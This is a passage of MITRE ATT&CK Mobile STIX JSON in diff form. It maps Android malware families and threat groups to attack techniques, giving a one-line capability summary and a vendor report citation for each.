"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.wandera.com/reddrop-malware/", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "source_name": "Wandera-RedDrop" + } + ], + "modified": "2019-09-10T13:14:39.009Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) captures live recordings of the device's surroundings.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5c1e3aa9-160d-49fd-83a2-2ed2f8c5435c", + "type": "relationship", + "created": "2021-02-17T20:43:52.324Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.324Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has collected phone metadata such as cell location, mobile country code (MCC), and mobile network code (MNC).(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0100020b-97d4-4657-bc71-c6a1774055a6", + "created": "2022-04-20T17:36:25.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:39:23.114Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has exfiltrated data via both SMTP and HTTP.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b19082d2-c151-45dd-8844-82335fbe3ed9", + "created": "2023-02-28T21:43:54.880Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:43:54.880Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can send text messages.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--789699c2-44f1-4280-bf86-ab23e6a13e84", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:18:51.813Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads calendar events and reminders.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1d828f51-1c04-466c-beaf-2d4de741a544", + "created": "2020-05-04T14:04:56.184Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Bread", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020.", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:03:18.675Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) can access SMS messages in order to complete carrier billing fraud.(Citation: Google Bread)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--806a9338-be20-4eef-aa54-067633ac0e58", + "type": "relationship", + "created": "2020-04-08T15:41:19.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2020-04-08T15:41:19.421Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can retrieve the device’s GPS location.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9cfc30de-3e68-4361-a213-3c37ce27b70e", + "created": "2023-03-20T18:52:52.011Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:52:52.011Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4cc8a16f-562a-42c7-b5d9-10e1088af89c", + "created": "2019-09-03T20:08:00.687Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:31:38.319Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) can intercept two-factor authentication codes transmitted via SMS.(Citation: Talos Gustuff Apr 2019) ", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f62e0aaf-e52f-40b9-a059-001f298a0660", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-Skygofree", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:19:00.168Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can be controlled via HTTP, XMPP, FirebaseCloudMessaging, or GoogleCloudMessaging in older versions.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--60782df8-1e96-48eb-a6b7-843c94b32b59", + "created": "2023-02-06T19:43:17.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:33:52.290Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can hide its application icon.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4009ff40-4616-4b1c-bff9-599e52ccab37", + "created": "2020-01-27T17:05:58.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:28:34.373Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain the device’s contact list.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--386b0a9f-9951-4717-8bce-30c8fbe05050", + "type": "relationship", + "created": "2020-06-26T15:32:24.955Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:32:24.955Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) uses standard payload and string obfuscation techniques.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--27050442-e578-44b7-9534-ada78824befe", + "created": "2023-02-06T19:45:09.612Z", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:45:09.612Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can intercept and read SMS messages.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--68c17e9b-1fda-49dd-982b-566d473cc32b", + "created": "2022-04-06T15:51:11.939Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:51:11.939Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--48c0d9f7-9293-4f38-8ae5-9f5342621f74", + "type": "relationship", + "created": "2021-01-05T20:16:20.511Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.511Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) has contained an alarm that triggers every three minutes and timers for communicating with the C2.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bed52256-e5d2-4f15-8c4c-27f709e10c6c", + "type": "relationship", + "created": "2020-06-26T14:55:13.380Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T14:55:13.380Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) dynamically loads its malicious functionality at runtime from an RC4-encrypted TTF file. [EventBot](https://attack.mitre.org/software/S0478) also utilizes ProGuard to obfuscate the generated APK file.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--33316f49-f1fb-453a-9ba7-d6889982a010", + "type": "relationship", + "created": "2020-07-20T13:27:33.459Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.516Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can obtain a list of installed applications.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a7336f2c-8f89-4d54-ac2b-77743afb2943", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-10-15T19:44:36.177Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) collects and uploads information about changes in SIM card or phone numbers on the device.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--383e5b12-061e-45c6-911b-b37187dd9254", + "type": "relationship", + "created": "2021-02-08T16:36:20.701Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.399Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included file enumeration in the malicious apps deployed as part of Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1e29a9ce-ed11-44ae-b66e-8b90ee79de6a", + "created": "2020-06-26T15:32:24.962Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:42:04.769Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) hides its icon from the application drawer after being launched for the first time.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4c7e776d-ed19-4e5a-842c-81612f5c07bd", + "created": "2019-09-03T19:45:48.503Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:10:38.937Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can download the address book.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--15065492-1aef-4cf8-af3c-cc763eee5daf", + "created": "2020-09-24T15:34:51.213Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:49:32.064Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can detect if it is being ran on an emulator.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2341fdfa-9699-4798-a35a-2cc4f150cd14", + "type": "relationship", + "created": "2019-07-10T15:35:43.610Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.693Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) retrieves a list of all applications installed on the device.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3f31b209-dbc7-4c7e-bb0a-e37801121c13", + "created": "2020-10-29T17:48:27.425Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:45:26.765Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) has registered to receive the `BOOT_COMPLETED` broadcast intent.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f0a0005e-cc38-4f7a-ba49-21a4c48ae1a1", + "type": "relationship", + "created": "2020-07-15T20:20:59.284Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.284Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can install attacker-specified components or applications.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a54c8c09-c849-4146-a7cc-158887222a6d", + "created": "2020-12-24T21:45:56.969Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": 